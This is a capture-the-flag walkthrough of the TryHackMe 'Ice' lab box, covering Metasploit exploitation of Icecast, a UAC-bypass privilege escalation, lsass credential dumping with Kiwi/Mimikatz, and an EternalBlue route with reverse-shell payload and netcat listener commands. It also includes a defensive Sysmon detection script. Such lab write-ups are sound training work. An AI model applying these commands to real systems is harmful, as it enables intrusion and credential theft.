TryHackMe- Ice Walkthrough

INTRODUCTION

In this walkthrough, I will be solving TryHackMe: Ice. Please NOTE that this is a small writeup, as I will directly be exploiting and gaining admin access on the machine, and I won't be answering all the small Q&A-type questions asked while solving the box, as I have written this blog only as a part of note keeping. If you want a detailed explanation I would highly suggest you check out https://youtu.be/Wc7NVl-wNXI OR search "Ratiros01 ice walkthrough", since all the images I have used here have been taken from the walkthrough of Ratiros01 as part of note keeping for my OSCP exam; I had a poor connection on the day of writing this walkthrough, so I decided to make a small note of the writeup of Ratiros01.

SO LET'S BEGIN...

We do a no-ping (-Pn) SYN (-sS) scan on our target IP and use -A for aggressive scanning, which includes OS and version detection.

On port 8000 we see a weird service called "Icecast" running.

We note that beside 445/tcp it shows "Windows 7 Professional Service Pack", which means it is running Windows 7, which is infamous for the EternalBlue vulnerability. There is also a user called DARK-PC.

Let's try to exploit the Icecast service using Metasploit. Open it and use the command "search icecast" and you will be greeted with the exploit.

Type "use 0" to select the exploit, then:

show options
set RHOST <target ip>
set LPORT 8000 (LPORT stays 8000 because the Icecast service is running on port 8000)
exploit

VOILA!!! We have gained a Meterpreter shell and now we can run commands to learn more about our target machine, such as sysinfo / whoami / ps.

We note that we are still not the admin (NT AUTHORITY\SYSTEM) user but merely the user called DARK, and we can try running the command "getsystem" to escalate privileges, but it fails...

So... let's try the local exploit suggester:

run post/multi/recon/local_exploit_suggester

We get a nice number of exploits for privilege escalation; let's use the highlighted one (eventvwr). To do so, go back to our previous session in Metasploit and background it with the "background" command, then type "sessions" to see our active sessions.

use exploit/windows/local/bypassuac_eventvwr
show options

We see an option called SESSION, so let's set the session for this exploit to 1 to refer to our previous session (the shell received through exploiting the Icecast service).

Now let's run it using the command "run" and we will see the exploit fails. So type "show options" again, and this time we see we have 2 more options, LHOST and LPORT. Set LHOST to your IP address (to check your IP address use "ip addr" and you will see an interface called "tun0").

Set the options correctly and run "exploit"; after the exploit completes, a new session will be created. Run the command "sessions" and switch to the new session with "sessions 2" (in this case it is session 2).

Now that you are in the new session, run the command "getprivs" and you will see many more privileges are open.

LOOTING: we need to move to a process that has permission to interact with the lsass service, which is responsible for authentication within Windows. We run the command "ps" to see the processes run by NT AUTHORITY\SYSTEM.

In order to interact with lsass we need to be "living in" a process that has the same architecture as the lsass service (x64 in the case of this machine) and the same permissions as lsass. The print spooler service (spoolsv.exe) happens to meet our needs perfectly.

Do read this amazing post to understand how process migration actually works: https://security.stackexchange.com/questions/90578/how-does-process-migration-work-in-meterpreter

migrate -N spoolsv.exe

Now we have migrated to the process, and when we run the command "getuid" we see that we have admin permissions!!!

GREAT!!! Now we can run Kiwi, which is an updated version of Mimikatz, a popular password dumping tool. Run the command "load kiwi" and then "help" to see all the options this tool provides...

You can also try using hashdump to dump all the hashes on the system and crack them, or use RDP to see what our target is doing in real time.
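As an added, defender-side example that is not part of the original walkthrough: the two privileged steps above (the eventvwr UAC bypass and reading lsass from a process migrated into spoolsv.exe) leave process-creation and process-access traces. The Python below runs two detection rules over constructed Sysmon-style log lines; the field names, the allowlist of expected lsass readers and every sample value are assumptions for illustration, not data from the box.

```python
from typing import Dict, List, Tuple

# Constructed Sysmon-style events (not captured from the box). Event 1 is process
# creation, event 10 is one process opening a handle to another.
SAMPLE_EVENTS = """\
EventID=1 ParentImage=C:\\Windows\\explorer.exe Image=C:\\Windows\\System32\\eventvwr.exe User=DARK-PC\\Dark
EventID=1 ParentImage=C:\\Windows\\System32\\eventvwr.exe Image=C:\\Windows\\System32\\mmc.exe User=DARK-PC\\Dark
EventID=1 ParentImage=C:\\Windows\\System32\\eventvwr.exe Image=C:\\Windows\\System32\\cmd.exe User=DARK-PC\\Dark
EventID=10 SourceImage=C:\\Windows\\System32\\spoolsv.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010
EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1000
"""

# Assumed baseline of processes that legitimately read lsass; tune per environment.
LSASS_READERS_ALLOWED = {"csrss.exe", "wininit.exe", "services.exe"}
PROCESS_VM_READ = 0x0010  # access right a credential dumper needs to read lsass memory


def parse_event(line: str) -> Dict[str, str]:
    """Turn 'Key=Value Key=Value' into a dict (paths here contain no spaces)."""
    return dict(tok.split("=", 1) for tok in line.split())


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(events: str) -> List[Tuple[str, int, str]]:
    """Return (rule, line_number, detail) for every suspicious event."""
    findings = []
    for n, line in enumerate(events.splitlines(), 1):
        if not line.strip():
            continue
        ev = parse_event(line)
        if ev.get("EventID") == "1":
            parent, child = basename(ev["ParentImage"]), basename(ev["Image"])
            # eventvwr.exe normally only launches mmc.exe; anything else is the bypass payload
            if parent == "eventvwr.exe" and child != "mmc.exe":
                findings.append(("eventvwr-uac-bypass", n, f"eventvwr.exe spawned {child}"))
        elif ev.get("EventID") == "10":
            src, tgt = basename(ev["SourceImage"]), basename(ev["TargetImage"])
            access = int(ev["GrantedAccess"], 16)
            # a migrated Meterpreter in spoolsv.exe reading lsass shows up as an unexpected reader
            if tgt == "lsass.exe" and access & PROCESS_VM_READ and src not in LSASS_READERS_ALLOWED:
                findings.append(("lsass-memory-read", n, f"{src} opened lsass.exe with 0x{access:x}"))
    return findings


if __name__ == "__main__":
    for rule, n, detail in detect(SAMPLE_EVENTS):
        print(f"line {n}: {rule}: {detail}")
```

The svchost.exe line is deliberately not flagged: its access mask lacks PROCESS_VM_READ, so it cannot be reading lsass memory.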

OTHER WAYS TO EXPLOIT: ETERNALBLUE!!!

You can also try exploiting EternalBlue using this GitHub repo.

For usage you can visit the GitHub repo or see the commands shared below:

python eternalblue_checker.py <ip>
cd shellcode
./shell_prep.sh

1. would you like to auto generate a reverse shell with msfvenom? (Y/n) : Y
2. LHOST : <attacker ip>
3. LPORT x64 : 8888
4. LPORT x86 : 9999
5. Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell : 1
6. Type 0 to generate a staged payload or 1 to generate a stageless payload : 1

Once it's done we create our listeners:

nc -lvp 8888
nc -lvp 9999

Let's run the exploit now...

python eternalblue_exploit7.py <ip> shellcode/sc_all.bin

We see that we have received a connection on netcat, and after typing "whoami" it shows NT AUTHORITY\SYSTEM, which means we are admin.

EXTRA CREDITS (MANUAL EXPLOITATION)

I would HIGHLY suggest you complete the Extra Credits part of this machine. It was mainly done using this exploit...

A few changes have to be made to the shellcode, and we also use certutil to move files from our attacking machine to Windows. In case you need any help with this, DO check out this separate manual walkthrough video by HackerSploit (LINK: https://www.youtube.com/watch?v=eIy69zUfbgI) and this writeup by Ratiros01 (https://ratiros01.medium.com/tryhackme-ice-d26eaed6f090), who have done a good job of explaining it in depth. Also do learn how to convert Metasploit modules to Python exploits.

THANKS FOR READING THIS WALKTHROUGH OF ICE... I'll try covering more boxes in the future.

-ZEUS

I am a penetration tester, currently pursuing OSCP. Skilled in network pentesting and developing hacking tools using Python. I share my knowledge on YouTube.